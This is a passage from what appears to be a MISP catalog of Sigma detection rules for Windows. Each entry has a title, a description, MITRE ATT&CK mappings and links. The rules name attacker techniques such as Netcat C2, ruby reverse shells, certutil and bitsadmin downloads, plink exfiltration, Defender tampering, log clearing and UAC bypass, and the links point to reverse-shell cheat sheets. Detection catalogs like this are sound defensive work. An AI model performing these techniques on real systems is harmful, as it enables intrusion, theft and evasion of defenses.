  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10858. Table References

Links

https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml

Microsoft Workflow Compiler Execution

Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.

The tag is: misp-galaxy:sigma-rules="Microsoft Workflow Compiler Execution"

Microsoft Workflow Compiler Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10859. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md

https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml

PUA - Netcat Suspicious Execution

Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network

The tag is: misp-galaxy:sigma-rules="PUA - Netcat Suspicious Execution"

PUA - Netcat Suspicious Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"

Table 10860. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md

https://nmap.org/ncat/

https://www.revshells.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_netcat.yml

Suspicious Download Via Certutil.EXE

Detects the execution of certutil with certain flags that allow the utility to download files.

The tag is: misp-galaxy:sigma-rules="Suspicious Download Via Certutil.EXE"

Suspicious Download Via Certutil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10861. Table References

Links

https://forensicitguy.github.io/agenttesla-vba-certutil-download/

https://twitter.com/egre55/status/1087685529016193025

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil

https://lolbas-project.github.io/lolbas/Binaries/Certutil/

https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download.yml

Suspicious Execution of Systeminfo

Detects usage of the "systeminfo" command to retrieve information

The tag is: misp-galaxy:sigma-rules="Suspicious Execution of Systeminfo"

Suspicious Execution of Systeminfo has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 10862. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_systeminfo_execution.yml

Domain Trust Discovery Via Dsquery

Detects execution of "dsquery.exe" for domain trust discovery

The tag is: misp-galaxy:sigma-rules="Domain Trust Discovery Via Dsquery"

Domain Trust Discovery Via Dsquery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

Table 10863. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md

https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb?gi=41b97a644843

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml

Suspicious Scan Loop Network

Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system

The tag is: misp-galaxy:sigma-rules="Suspicious Scan Loop Network"

Suspicious Scan Loop Network has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

Table 10864. Table References

Links

https://ss64.com/ps/foreach-object.html

https://ss64.com/nt/for.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_scan_loop.yml

Logged-On User Password Change Via Ksetup.EXE

Detects password change for the logged-on user’s via "ksetup.exe"

The tag is: misp-galaxy:sigma-rules="Logged-On User Password Change Via Ksetup.EXE"

Table 10865. Table References

Links

https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ksetup_password_change_user.yml

Suspicious JavaScript Execution Via Mshta.EXE

Detects execution of javascript code using "mshta.exe".

The tag is: misp-galaxy:sigma-rules="Suspicious JavaScript Execution Via Mshta.EXE"

Suspicious JavaScript Execution Via Mshta.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"

Table 10866. Table References

Links

https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml

Ruby Inline Command Execution

Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.

The tag is: misp-galaxy:sigma-rules="Ruby Inline Command Execution"

Ruby Inline Command Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10867. Table References

Links

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://www.revshells.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ruby_inline_command_execution.yml

Execution of plink to perform data exfiltration and tunneling

The tag is: misp-galaxy:sigma-rules="Potential RDP Tunneling Via Plink"

Potential RDP Tunneling Via Plink has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

Table 10868. Table References

Links

https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_plink_susp_tunneling.yml

Potential Persistence Via Logon Scripts - CommandLine

Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Logon Scripts - CommandLine"

Potential Persistence Via Logon Scripts - CommandLine has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Logon Script (Windows) - T1037.001" with estimative-language:likelihood-probability="almost-certain"

Table 10869. Table References

Links

https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_logon_script.yml

Delete Important Scheduled Task

Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities

The tag is: misp-galaxy:sigma-rules="Delete Important Scheduled Task"

Delete Important Scheduled Task has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

Table 10870. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_delete.yml

Obfuscated IP Download Activity

Detects use of an encoded/obfuscated version of an IP address (hex, octal…​) in an URL combined with a download command

The tag is: misp-galaxy:sigma-rules="Obfuscated IP Download Activity"

Table 10871. Table References

Links

https://twitter.com/Yasser_Elsnbary/status/1553804135354564608

https://twitter.com/fr0s7_/status/1712780207105404948

https://h.43z.one/ipconverter/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml

Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE

Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData.

The tag is: misp-galaxy:sigma-rules="Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE"

Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10872. Table References

Links

https://redcanary.com/threat-detection-report/threats/qbot/

https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_exclusion.yml

Interesting Service Enumeration Via Sc.EXE

Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe". Attackers often try to enumerate the services currently running on a system in order to find different attack vectors.

The tag is: misp-galaxy:sigma-rules="Interesting Service Enumeration Via Sc.EXE"

Interesting Service Enumeration Via Sc.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 10873. Table References

Links

https://pentestlab.blog/tag/svchost/

https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_query_interesting_services.yml

Suspicious Windows Defender Registry Key Tampering Via Reg.EXE

Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection

The tag is: misp-galaxy:sigma-rules="Suspicious Windows Defender Registry Key Tampering Via Reg.EXE"

Suspicious Windows Defender Registry Key Tampering Via Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10874. Table References

Links

https://www.elevenforum.com/t/video-guide-how-to-completely-disable-microsoft-defender-antivirus.14608/page-2

https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/

https://github.com/swagkarna/Defeat-Defender-V1.2.0

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_windows_defender_tamper.yml

Wusa Extracting Cab Files

Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument which is not longer supported. This could indicate an attacker using an old technique

The tag is: misp-galaxy:sigma-rules="Wusa Extracting Cab Files"

Table 10876. Table References

Links

https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_cab_files_extraction.yml

Suspicious Process Created Via Wmic.EXE

Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsrv32", etc.

The tag is: misp-galaxy:sigma-rules="Suspicious Process Created Via Wmic.EXE"

Suspicious Process Created Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10877. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

https://thedfirreport.com/2020/10/08/ryuks-return/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_susp_process_creation.yml

Suspicious Process Execution From Fake Recycle.Bin Folder

Detects process execution from a fake recycle bin folder, often used to avoid security solution.

The tag is: misp-galaxy:sigma-rules="Suspicious Process Execution From Fake Recycle.Bin Folder"

Table 10878. Table References

Links

https://www.mandiant.com/resources/blog/infected-usb-steal-secrets

https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml

Suspicious HH.EXE Execution

Detects a suspicious execution of a Microsoft HTML Help (HH.exe)

The tag is: misp-galaxy:sigma-rules="Suspicious HH.EXE Execution"

Suspicious HH.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 10879. Table References

Links

https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/

https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_susp_execution.yml

Webshell Tool Reconnaissance Activity

Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands

The tag is: misp-galaxy:sigma-rules="Webshell Tool Reconnaissance Activity"

Webshell Tool Reconnaissance Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 10880. Table References

Links

https://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_tool_recon.yml

Computer Password Change Via Ksetup.EXE

Detects password change for the computer’s domain account or host principal via "ksetup.exe"

The tag is: misp-galaxy:sigma-rules="Computer Password Change Via Ksetup.EXE"

Table 10881. Table References

Links

https://twitter.com/Oddvarmoe/status/1641712700605513729

https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ksetup_password_change_computer.yml

Suspicious Eventlog Clear or Configuration Change

Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).

The tag is: misp-galaxy:sigma-rules="Suspicious Eventlog Clear or Configuration Change"

Suspicious Eventlog Clear or Configuration Change has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 10882. Table References

Links

https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html

https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/

https://gist.github.com/fovtran/ac0624983c7722e80a8f5a4babb170ee

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml

Suspicious Certreq Command to Download

Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files

The tag is: misp-galaxy:sigma-rules="Suspicious Certreq Command to Download"

Suspicious Certreq Command to Download has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10883. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Certreq/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml

Renamed BrowserCore.EXE Execution

Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)

The tag is: misp-galaxy:sigma-rules="Renamed BrowserCore.EXE Execution"

Renamed BrowserCore.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10884. Table References

Links

https://twitter.com/mariuszbit/status/1531631015139102720

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml

Potential Script Proxy Execution Via CL_Mutexverifiers.ps1

Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands

The tag is: misp-galaxy:sigma-rules="Potential Script Proxy Execution Via CL_Mutexverifiers.ps1"

Potential Script Proxy Execution Via CL_Mutexverifiers.ps1 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 10885. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml

HackTool - Default PowerSploit/Empire Scheduled Task Creation

Detects the creation of a schtask via PowerSploit or Empire Default Configuration.

The tag is: misp-galaxy:sigma-rules="HackTool - Default PowerSploit/Empire Scheduled Task Creation"

HackTool - Default PowerSploit/Empire Scheduled Task Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10886. Table References

Links

https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1

https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml

Tor Client/Browser Execution

Detects the use of Tor or Tor-Browser to connect to onion routing networks

The tag is: misp-galaxy:sigma-rules="Tor Client/Browser Execution"

Tor Client/Browser Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"

Table 10887. Table References

Links

https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_tor_execution.yml

PUA - Seatbelt Execution

Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters

The tag is: misp-galaxy:sigma-rules="PUA - Seatbelt Execution"

PUA - Seatbelt Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Service Discovery - T1526" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 10888. Table References

Links

https://github.com/GhostPack/Seatbelt

https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml

HackTool - Inveigh Execution

Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool

The tag is: misp-galaxy:sigma-rules="HackTool - Inveigh Execution"

HackTool - Inveigh Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10889. Table References

Links

https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/

https://github.com/Kevin-Robertson/Inveigh

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_inveigh.yml

UAC Bypass Abusing Winsat Path Parsing - Process

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Abusing Winsat Path Parsing - Process"

UAC Bypass Abusing Winsat Path Parsing - Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10890. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml

Potentially Suspicious Child Process Of Regsvr32

Detects potentially suspicious child processes of "regsvr32.exe".

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Child Process Of Regsvr32"

Potentially Suspicious Child Process Of Regsvr32 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 10891. Table References

Links

https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo

https://www.echotrail.io/insights/search/regsvr32.exe

https://redcanary.com/blog/intelligence-insights-april-2022/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml

Webshell Detection With Command Line Keywords

Detects certain command line parameters often used during reconnaissance activity via web shells

The tag is: misp-galaxy:sigma-rules="Webshell Detection With Command Line Keywords"

Webshell Detection With Command Line Keywords has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

Table 10892. Table References

Links

https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html

https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml

Suspicious Execution of Shutdown to Log Out

Detects the rare use of the command line tool shutdown to logoff a user

The tag is: misp-galaxy:sigma-rules="Suspicious Execution of Shutdown to Log Out"

Suspicious Execution of Shutdown to Log Out has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"

Table 10894. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown

https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shutdown_logoff.yml

Unmount Share Via Net.EXE

Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation

The tag is: misp-galaxy:sigma-rules="Unmount Share Via Net.EXE"

Unmount Share Via Net.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1070.005" with estimative-language:likelihood-probability="almost-certain"

Table 10895. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_share_unmount.yml

Add Insecure Download Source To Winget

Detects usage of winget to add a new insecure (http) download source. Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)

The tag is: misp-galaxy:sigma-rules="Add Insecure Download Source To Winget"

Add Insecure Download Source To Winget has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10896. Table References

Links

https://learn.microsoft.com/en-us/windows/package-manager/winget/source

https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml

Launch-VsDevShell.PS1 Proxy Execution

Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.

The tag is: misp-galaxy:sigma-rules="Launch-VsDevShell.PS1 Proxy Execution"

Launch-VsDevShell.PS1 Proxy Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PubPrn - T1216.001" with estimative-language:likelihood-probability="almost-certain"

Table 10897. Table References

Links

https://twitter.com/nas_bench/status/1535981653239255040

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml

Interactive AT Job

Detects an interactive AT job, which may be used as a form of privilege escalation.

The tag is: misp-galaxy:sigma-rules="Interactive AT Job"

Interactive AT Job has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="At - T1053.002" with estimative-language:likelihood-probability="almost-certain"

Table 10898. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md

https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml

Suspicious Download From File-Sharing Website Via Bitsadmin

Detects usage of bitsadmin downloading a file from a suspicious domain

The tag is: misp-galaxy:sigma-rules="Suspicious Download From File-Sharing Website Via Bitsadmin"

Suspicious Download From File-Sharing Website Via Bitsadmin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10899. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/

https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin

https://www.cisa.gov/uscert/ncas/alerts/aa22-321a

https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/

https://isc.sans.edu/diary/22264

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml

Sdiagnhost Calling Suspicious Child Process

Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)

The tag is: misp-galaxy:sigma-rules="Sdiagnhost Calling Suspicious Child Process"

Sdiagnhost Calling Suspicious Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10900. Table References

Links

https://twitter.com/nao_sec/status/1530196847679401984

https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/

https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/

https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml

Suspicious Child Process of AspNetCompiler

Detects potentially suspicious child processes of "aspnet_compiler.exe".

The tag is: misp-galaxy:sigma-rules="Suspicious Child Process of AspNetCompiler"

